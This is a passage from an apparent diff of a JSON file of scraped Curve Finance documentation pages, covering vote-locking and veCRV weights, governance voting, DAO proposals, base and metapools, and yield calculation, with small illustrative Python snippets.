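print(initial_vecrv(1_000, 1))   # 250.0 -- the example given in the text
print(initial_vecrv(10_000, 1))  # 2500.0 -- the DAO proposal threshold
now = datetime(2022, 1, 1)
print(vecrv_weight(1_000, unlock=datetime(2023, 1, 1), now=now))  # one year left -> 250.0
```

The same numbers explain the 2,500 veCRV proposal threshold quoted in the proposal pages: either 2,500 CRV locked for four years or 10,000 CRV locked for one year.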
The number of veCRV you will receive depends on how long you lock your CRV for. The minimum locking time is one week and the maximum locking time is four years. Your veCRV weight gradually decreases as your escrowed tokens approach their lock expiry. A graph illustrating the decrease can be found at this address: https://dao.curve.fi/locker How is your boost calculated? To reach your maximum boost of 2.5x, there are several parameters to take into consideration. You can find the current DAO voting power at this address: https://dao.curve.fi/locker You can find a calculator at this address: https://dao.curve.fi/minter/calc What if I provide liquidity in multiple pools? Your voting power applies to all gauges but may produce different boosts based on how much liquidity you are providing and how much total liquidity the pool has. What happens if more people vote lock? If other liquidity providers vote lock more CRV, your boost will stay what it was when you applied it. If you abuse this, another user can kick and force a boost update to take you down to your real boost. How often does my boost records voting power changes? Your voting weight decreases over time but your boost will take notice of your decreasing voting power at certain checkpoints like withdrawing, depositing into a gauge or minting CRV. For example if you start at 1000 veCRV and your voting power decreases to 800 veCRV, your boost will still use your original voting power of 1000 veCRV until a user checkpoint. How can I apply my boost? After creating or adding to your lock, you need to click the apply boost button to update your boost on each of the gauge you're providing liquidity in. Your boost can also be updated by depositing or withdrawing from a gauge. Click below for a guide on how locking and boosting your CRV rewards Boosting your CRV Rewards How to know my boost is active? If your boost is showing then it is active. If you have locked but your boost isn't showing then you need to apply it. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Vote-locking FAQ Table of contents What is vote locking? What is the vote locking boost? When does the boost start? What are veCRV? How is your boost calculated? What if I provide liquidity in multiple pools? What happens if more people vote lock? How often does my boost record voting power changes? How can I apply my boost? How to know my boost is active? 
Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents What is vote locking? What is the vote locking boost? When does the boost start? What are veCRV? How is your boost calculated? What if I provide liquidity in multiple pools? What happens if more people vote lock? How often does my boost record voting power changes? How can I apply my boost? How to know my boost is active? Home Governance Vote-locking FAQ Answering all your burning questions about the vote locking boost What is vote locking? CRV holders can vote lock their CRV into the Curve DAO to receive veCRV. The longer they lock for, the more veCRV they receive. Vote locking allows you to vote in governance, boost your CRV rewards and receive trading fees. What is the vote locking boost? When vote locking CRV, you will also earn a boost on your provided liquidity of up to 2.5x. The goal is to incentivise users to participate in governance by rewarding them with a bigger share of the daily CRV inflation. When does the boost start? The boost will start on the 26th of August 2020 around 11pm UTC. What are veCRV? veCRV stands for voting escrow CRV. They are your CRV locked for voting. The longer you lock your CRV for, the more voting power you have (and the bigger boost you can reach). You can vote lock 1,000 CRV for a year to have a 250 veCRV weight. Each CRV locked for four years is equal to 1 veCRV. The number of veCRV you will receive depends on how long you lock your CRV for. The minimum locking time is one week and the maximum locking time is four years. Your veCRV weight gradually decreases as your escrowed tokens approach their lock expiry. A graph illustrating the decrease can be found at this address: https://dao.curve.fi/locker How is your boost calculated? To reach your maximum boost of 2.5x, there are several parameters to take into consideration. You can find the current DAO voting power at this address: https://dao.curve.fi/locker You can find a calculator at this address: https://dao.curve.fi/minter/calc What if I provide liquidity in multiple pools? Your voting power applies to all gauges but may produce different boosts based on how much liquidity you are providing and how much total liquidity the pool has. What happens if more people vote lock? If other liquidity providers vote lock more CRV, your boost will stay at what it was when you applied it. If you abuse this, another user can kick you and force a boost update to take you down to your real boost. How often does my boost record voting power changes? Your voting weight decreases over time but your boost will take notice of your decreasing voting power at certain checkpoints like withdrawing, depositing into a gauge or minting CRV. For example, if you start at 1000 veCRV and your voting power decreases to 800 veCRV, your boost will still use your original voting power of 1000 veCRV until a user checkpoint. How can I apply my boost? 
After creating or adding to your lock, you need to click the apply boost button to update your boost on each of the gauges you're providing liquidity in. Your boost can also be updated by depositing or withdrawing from a gauge. Click below for a guide on locking and boosting your CRV rewards Boosting your CRV Rewards How to know my boost is active? If your boost is showing then it is active. If you have locked but your boost isn't showing then you need to apply it. 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2010,7 +2018,7 @@ { "title": "Voting", "html_url": "https://resources.curve.fi/governance/voting/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Voting Table of contents Voting How to participate in governance? What are veCRV? Can I start voting right away? How to vote? Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Voting How to participate in governance? What are veCRV? Can I start voting right away? How to vote? Voting Voting How to participate in governance? To participate in governance, Curve Finance users need to lock their CRV into a voting escrow. You can do so at this address: https://dao.curve.fi/locker What are veCRV? veCRV stands for voting escrow CRV. They are your CRV locked for voting. The longer you lock your CRV for, the more voting power you have (and the bigger boost you can reach). You can vote lock 1,000 CRV for a year to have a 250 veCRV weight. Your veCRV weight gradually decreases as your escrowed tokens approach their lock expiry. A graph illustrating the decrease can be found at this address: https://dao.curve.fi/locker Get more voting power by locking your CRV for a longer period of time. Can I start voting right away? You can only vote using your voting weight at the block where a proposal was created. How to vote? Simply visit the proposal of your choice, click your vote option and confirm your transaction. You can find DAO proposals at this address: https://dao.curve.fi/dao Where can I find out about governance? 
You can visit the Curve Finance governance forum at this address http://gov.curve.fi/ Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Voting Table of contents How to participate in governance? What are veCRV? Can I start voting right away? How to vote? Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents How to participate in governance? What are veCRV? Can I start voting right away? How to vote? Home Governance Voting How to participate in governance? To participate in governance, Curve Finance users need to lock their CRV into a voting escrow. You can do so at this address: https://dao.curve.fi/locker What are veCRV? veCRV stands for voting escrow CRV. They are your CRV locked for voting. The longer you lock your CRV for, the more voting power you have (and the bigger boost you can reach). You can vote lock 1,000 CRV for a year to have a 250 veCRV weight. Your veCRV weight gradually decreases as your escrowed tokens approach their lock expiry. A graph illustrating the decrease can be found at this address: https://dao.curve.fi/locker Get more voting power by locking your CRV for a longer period of time. Can I start voting right away? You can only vote using your voting weight at the block where a proposal was created. How to vote? Simply visit the proposal of your choice, click your vote option and confirm your transaction. You can find DAO proposals at this address: https://dao.curve.fi/dao Where can I find out about governance? 
You can visit the Curve Finance governance forum at this address: http://gov.curve.fi/ 2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2018,23 +2026,23 @@ { "title": "Community fund", "html_url": "https://resources.curve.fi/governance/proposals/community-fund/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Community fund Table of contents Community Fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Community Fund Community fund Community Fund CRV initial distribution allowed for a community fund of around $151M to be used in cases of emergencies or awarded to community-lead initiatives. The Curve DAO can decide to award part of this fund through a proposal. Creating a DAO proposal If you have a project you feel is deserving a grant, please create a proposal or come discuss it with a team member on Discord or Telegram. 
Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Community fund Table of contents Community Fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Community Fund Home Governance Proposals Community fund Community Fund The CRV initial distribution allowed for a community fund of around $151M to be used in cases of emergencies or awarded to community-led initiatives. The Curve DAO can decide to award part of this fund through a proposal. Creating a DAO proposal If you have a project you feel is deserving of a grant, please create a proposal or come discuss it with a team member on Discord or Telegram. 
2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Creating a dao proposal", + "title": "Creating a DAO proposal", "html_url": "https://resources.curve.fi/governance/proposals/creating-a-dao-proposal/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Creating a dao proposal Table of contents Creating a DAO proposal Creating your vote Creating your proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Creating a DAO proposal Creating your vote Creating your proposal Creating a dao proposal Creating a DAO proposal Official DAO proposals are the only way to create enforceable change on the Curve protocol. There are currently two type of votes: parameter and text. Parameter votes are automatically committed to the DAO three days after they are enacted at the end of the vote. Text proposals are different as they will often necessitate development. For those, it is recommended to discuss with the Curve team to understand feasibility and create a signalling proposal. To create a new DAO proposal, you need at least 2,500 veCRV (2,500 CRV locked for four years or 10,000 CRV locked for one year). Creating your vote Visit the Curve DAO: https://dao.curve.fi/dao , select your type of vote and submit it. Creating your proposal Every DAO proposal must be accompanied with a proposal on the Curve governance forum. Visit the proposal section: https://gov.curve.fi/c/proposals/8 and click \"New Topic\" . You will then be presented with a template to help you present your proposed choices to the community. After that's done, be sure to engage with members of the community who have questions about your proposal. 
Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Creating a DAO proposal Table of contents Creating a DAO proposal Creating your vote Creating your proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Creating a DAO proposal Creating your vote Creating your proposal Home Governance Proposals Creating a DAO proposal Creating a DAO proposal Official DAO proposals are the only way to create enforceable change on the Curve protocol. There are currently two types of votes: parameter and text. Parameter votes are automatically committed to the DAO three days after they are enacted at the end of the vote. Text proposals are different as they will often necessitate development. For those, it is recommended to discuss with the Curve team to understand feasibility and create a signalling proposal. To create a new DAO proposal, you need at least 2,500 veCRV (2,500 CRV locked for four years or 10,000 CRV locked for one year). Creating your vote Visit the Curve DAO: https://dao.curve.fi/dao , select your type of vote and submit it. Creating your proposal Every DAO proposal must be accompanied by a proposal on the Curve governance forum. Visit the proposal section: https://gov.curve.fi/c/proposals/8 and click \"New Topic\" . You will then be presented with a template to help you present your proposed choices to the community. After that's done, be sure to engage with members of the community who have questions about your proposal. 
2023-09-28 Back to top", "labels": [ "Documentation" ] }, { - "title": "Base and metapools", + "title": "Base- and Metapools", "html_url": "https://resources.curve.fi/lp/base-and-metapools/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Base and metapools Table of contents Base & MetaPools Plain v1 Pools Lending Pools MetaPools Deposit faqs Calculating yield Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Base & MetaPools Plain v1 Pools Lending Pools MetaPools Base and metapools Base & MetaPools Plain v1 Pools A plain pool is the simplest and earliest implementation of Curve, where all assets in the pool are ordinary ERC-20 tokens pegged to the same price. One of the largest is TriPool , holding only the three biggest stable coins (USDC/USDT/DAI). It's a non-lending gas optimised pool similar to the sUSD one. Depositing into the Tri-Pool In plain pools, your risks are as follow: Smart contract issues with Curve Systemic issues with the stable coins in those pools Systemic issues with Synthetix (for sUSD) As you can see, risks are different which might make this pool a better choice for you depending on what your concerns in the cryptosphere are. Lending Pools A small number of v1 pools are lending pools, which means you earn interest from lending as well as trading fees. The Compound pool is the first and oldest. The you see above stands for cTokens which are Compound native tokens. This means your stable coins in the Compound pool would only be lent on the Compound protocol. Another pool is yPool which are tokens for Yearn Finance, a yield aggregator. You might think that Compound doesnt always have the best lending rates and you would be right and thus the yToken balances automatically rebalance your stable coin to the protocol(s) with the better rates (Compound, Aave and dYdX). Its free and non-custodial (as is Curve) but it is also why the yPools are considered more risky as you use a series of protocols that could themselves have critical vulnerabilities. Pools like AAVE and sAAVE also lend on AAVE v2. Lending pools are generally more expensive to interact with. 
In those pools, your risks are as follow: Smart contract issues with lending protocols Smart contract issues with Curve Smart contract issues with iEarn Systemic issues with the stable coins in those pools Whilst its important to not underplay risks associated with providing liquidity on Curve or DeFi in general, its worth noting that all the protocols mentioned above have existed for several months (or more for Compound or iEarn) meaning they have been extensively time tested and exploit attempts have been numerous. MetaPools Metapools allow for one token to seemingly trade with another underlying base pool. This means we could create, for example, the Gemini USD metapool : [GUSD, [3Pool]]. In this example users could seamlessly trade GUSD between the three coins in the 3Pool (DAI/USDC/USDT). This is helpful in multiple ways: Prevents diluting existing pools Allows Curve to list less liquid assets More volume and more trading fees for the DAO The Metapool in question would take GUSD and 3Pool LP tokens. This means that liquidity providers of the 3Pool who do not provide liquidity in the GUSD Metapool are shielded from systemic risks from the Metapool. Metapools in the UI will have a deposit wrapped option to deposit the 3pool token. Last update: 2023-08-15 Back to top", + "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding Curve (v1) Understanding CryptoPools (v2) $CRV Token $CRV Token Understanding CRV CRV Basics CRV Tokenomics Staking your CRV Claiming trading fees $crvUSD $crvUSD Understanding crvUSD Loan Creation & Management Loan Details & Concepts crvUSD FAQ Liquidity Providers Liquidity Providers Understanding curve pools Base- and Metapools Base- and Metapools Table of contents Plain v1 Pools Lending Pools MetaPools Deposit FAQ Calculating yield Charts and Pool Activity Depositing Depositing Overview Depositing into the tri-pool Depositing into a metapool Depositing into the susd-pool Depositing into a cryptoswap-pool Depositing into a tricrypto-pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your CRV rewards Gauge weights Permissionless rewards Governance Governance Understanding governance Voting Snapshot Vote-locking FAQ Proposals Proposals Proposals Community fund Creating a DAO proposal Multi-Chain Multi-Chain Understanding multi-chain Bridging funds Factory Pools Factory Pools Understanding pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross-Asset swaps Recovering cross-asset swaps Dropping and replacing a stuck transaction Disabling crypto wallets in brave Appendix Appendix Security Glossary Links Links Curve.fi Curve DAO Github Governance Forum Twitter Technical Docs Table of contents Plain v1 Pools Lending Pools MetaPools Home Liquidity Providers Base- and Metapools Plain v1 Pools A plain pool is the simplest and earliest implementation of Curve, where all assets in the pool are ordinary ERC-20 tokens pegged to the same price. One of the largest is TriPool, holding only the three biggest stable coins (USDC/USDT/DAI). It's a non-lending gas-optimised pool similar to the sUSD one. 
Depositing into the Tri-Pool In plain pools, your risks are as follows: Smart contract issues with Curve Systemic issues with the stable coins in those pools Systemic issues with Synthetix (for sUSD) As you can see, risks are different, which might make this pool a better choice for you depending on what your concerns in the cryptosphere are. Lending Pools A small number of v1 pools are lending pools, which means you earn interest from lending as well as trading fees. The Compound pool is the first and oldest. The c prefix you see above stands for cTokens, which are Compound native tokens. This means your stable coins in the Compound pool would only be lent on the Compound protocol. Another pool is the yPool, whose yTokens are tokens for Yearn Finance, a yield aggregator. You might think that Compound doesn't always have the best lending rates, and you would be right, and thus the yToken balances automatically rebalance your stable coins to the protocol(s) with the better rates (Compound, Aave and dYdX). It's free and non-custodial (as is Curve), but it is also why the yPools are considered more risky, as you use a series of protocols that could themselves have critical vulnerabilities. Pools like AAVE and sAAVE also lend on AAVE v2. Lending pools are generally more expensive to interact with. In those pools, your risks are as follows: Smart contract issues with lending protocols Smart contract issues with Curve Smart contract issues with iEarn Systemic issues with the stable coins in those pools Whilst it's important not to underplay the risks associated with providing liquidity on Curve or DeFi in general, it's worth noting that all the protocols mentioned above have existed for several months (or more for Compound or iEarn), meaning they have been extensively time-tested and exploit attempts have been numerous. MetaPools Metapools allow for one token to seemingly trade with another underlying base pool. This means we could create, for example, the Gemini USD metapool: [GUSD, [3Pool]]. In this example, users could seamlessly trade GUSD between the three coins in the 3Pool (DAI/USDC/USDT). This is helpful in multiple ways: Prevents diluting existing pools Allows Curve to list less liquid assets More volume and more trading fees for the DAO The Metapool in question would take GUSD and 3Pool LP tokens. This means that liquidity providers of the 3Pool who do not provide liquidity in the GUSD Metapool are shielded from systemic risks from the Metapool. Metapools in the UI will have a deposit wrapped option to deposit the 3pool token. 
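The [GUSD, [3Pool]] layout described above fully determines how an underlying trade must route, since the metapool itself only ever holds GUSD and the 3Pool LP token (3CRV). The Python sketch below is a conceptual illustration of that routing only, not on-chain code; in the actual contracts this path is handled internally by the metapool's exchange_underlying function.

```python
# Conceptual routing for a metapool [GUSD, [3Pool]]: the pool holds only
# GUSD and 3CRV (the 3Pool LP token), so trades against DAI/USDC/USDT
# have to hop through the base pool.
BASE_COINS = ["DAI", "USDC", "USDT"]   # 3Pool
UNDERLYING = ["GUSD"] + BASE_COINS     # index 0 is the metapool's own coin

def route(i: int, j: int) -> list[str]:
    """List the hops for an underlying swap from UNDERLYING[i] to UNDERLYING[j]."""
    if i == 0:   # GUSD -> a base coin
        return ["swap GUSD -> 3CRV in the metapool",
                f"burn 3CRV for {UNDERLYING[j]} in the 3Pool"]
    if j == 0:   # a base coin -> GUSD
        return [f"deposit {UNDERLYING[i]} into the 3Pool for 3CRV",
                "swap 3CRV -> GUSD in the metapool"]
    return [f"swap {UNDERLYING[i]} -> {UNDERLYING[j]} directly in the 3Pool"]

print(route(0, 2))  # GUSD -> USDC routes through the 3Pool LP token
```

This routing is also why 3Pool LPs who stay out of the metapool are shielded: exposure to GUSD is confined to the metapool's own 3CRV holdings.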
2023-09-28 Back to top", "labels": [ "Documentation" ] @@ -2042,23 +2050,31 @@ { "title": "Calculating yield", "html_url": "https://resources.curve.fi/lp/calculating-yield/", - "body": "Curve Resources CurveDocs/curve-resources Home Getting Started Getting Started Understanding curve Understanding crypto pools $crvUSD $crvUSD Understanding crvusd Markets Loan creation Loan details Understanding tokenomics FAQ $CRV Token $CRV Token Understanding crv Crv basics Crv tokenomics Staking your crv Claiming trading fees Liquidity Providers Liquidity Providers Understanding curve pools Base and metapools Deposit faqs Calculating yield Calculating yield Table of contents Calculating Yield Types of Yield Base vAPY Incentives tAPR Depositing Depositing Depositing Depositing into a metapool Depositing into the susd pool Depositing into the tri pool Depositing into the y pool Reward Gauges Reward Gauges Understanding gauges Creating a pool gauge Boosting your crv rewards Gauge weights Governance Governance Understanding governance Vote locking boost Voting Snapshot Proposals Proposals Proposals Community fund Creating a dao proposal Multichain Multichain Understanding multichain Bridging funds Using curve on fantom Using curve on polygon Factory Pools Factory Pools Pool factory Creating a stableswap pool Creating a cryptoswap pool Understanding oracles Troubleshooting Troubleshooting Support Cross asset swaps Recovering a cross asset swap Dropping and replacing a stuck transaction None Appendix Appendix Glossary Security Links Links Curve.fi Curve DAO Github Governance Forum Technical Docs Twitter Techincal Documentation Table of contents Calculating Yield Types of Yield Base vAPY Incentives tAPR Calculating yield Calculating Yield Explanation of how the Curve UI displays yield calculations Like all documentation within this guide, this article is intended to be detailed but non-technical, outside of a few light mathematical formulas. While we highlight specific smart contract function names that the Curve UI may reference for convenience, no knowledge of coding is otherwise necessary to understand this article. Developers seeking a more in-depth explanation of these concepts should consult the technical documentation at https://curve.readthedocs.io/ Types of Yield Curve UI displaying different types of displayed Curve yield (tAPY and tAPR). In the above screenshot you can see a Curve pool has the potential to offer many different types of yield. The documentation provides an overview of the different types of yield here: Understanding $CRV Its important to remember that these numbers are a projections of historical pool performance. The user would get this rate if the pool performance stays exactly the same for one year. These yield types are: Base vAPY: Shown on the first line, this number represents the fees that accrue to holders of the LP token based on trading volume. More Info $CRV Rewards tAPR: Shown on the second line, the rewards tAPR represents the rate of $CRV token emissions one would have earned if the pool has a rewards gauge and the user stakes into this rewards gauge. The number is listed as a range of possible rewards, based on the users locked veCRV the size of this boost can vary. More Info Incentives Rewards tAPR: Some pools also choose to stream rewards in the form of a different token this is represented on the third line if applicable. 
vAPY stands for variable annual percentage yield , this value calculates an annualized estimate of the trading fee yield based on the past days trading activity, inclusive of any effect of compounding. The rewards tAPR stands for token annual percentage rate token rewards must be claimed manually and therefore do not automatically compound, so rate is the more proper term. Base vAPY When Curve pools are launched, they receive a value for both the fee (the overall fee applied to trades) and the admin_fee (the percentage of this fee that goes to the Curve DAO as opposed to pool LPs). These parameters are directly viewable on the smart contract through the corresponding function names. These fees are displayed on the Curve UI pool page: These parameters may also be updated in the future by the Curve DAO by calling the commit_new_fee method. If the fees are in the process of being changed, these are readable in the smart contract via the future_fee and future_admin_fee methods. The fees are specifically earned or charged every time a user interacts with a pool contract through a transaction which may affect the pool balances. For example, directly calling the exchange function would rebalance the pool, so a fee clearly applies. If you add or remove liquidity in an imbalanced fashion, this would also adjust the ratios of tokens within the pool and thus be subject to fees. No fees are charged if a user adds coin in a balanced proportion or on removal. When you call methods to preview how many tokens you might receive for interacting with a pool (ie get_dy or calc_token_amount ) the values they return are usually but not always inclusive of any fees the UI calculations are intended to make any corrections where appropriate, but be sure to ask the support team if you have questions. Theoretically, one could calculate the base vAPY for any period by calculating the fees for every transaction and summing over the entire range. However, the Curve UI utilizes a simpler methodology to calculate the base vAPY, where t is the time in days: $$ \\left[ \\frac{virtual\\_price({t=0})}{virtual\\_price({t=-1})} \\right] ^{365} - 1 $$ In other words, the vAPY measures the change in the pools \"virtual price\" between today and yesterday, then annualizes this rate. The \"virtual price\" is a measure of the pool growth over time, and is viewable directly on the UI. The UI receives this value directly by calling the get_virtual_price method on the pool contract. Every time a transaction occurs that charges a fee, the virtual price is incremented accordingly. Thus, when a pool launches with a virtual price of exactly 1, if the pools virtual price is 1.01 at some future time, an LP holding a token has seen the tokens value increase by 1%. $$ \\frac{1.01}{1.00} - 1 = 0.01 = 1\\% $$ A virtual price of 1.01 means an LP will get 1% more value back on removing liquidity. Similarly, new users adding liquidity will receive 1% fewer LP tokens on deposit. For pegged stablecoin pools, virtual price can easily be utilized to calculate vAPY of the pool since inception with no further calculations necessary. For v2 pools, one must also consider the fluctuating prices of underlying assets. For developers, here are more details about trade fees from the technical documentation: About Trade Fees Claiming Admin Fees Fee Distribution $CRV Rewards tAPR The Curve DAO also authorizes some pools to receive bonus rewards from $CRV token emission, as described in the Understanding Gauges section of the documentation. 
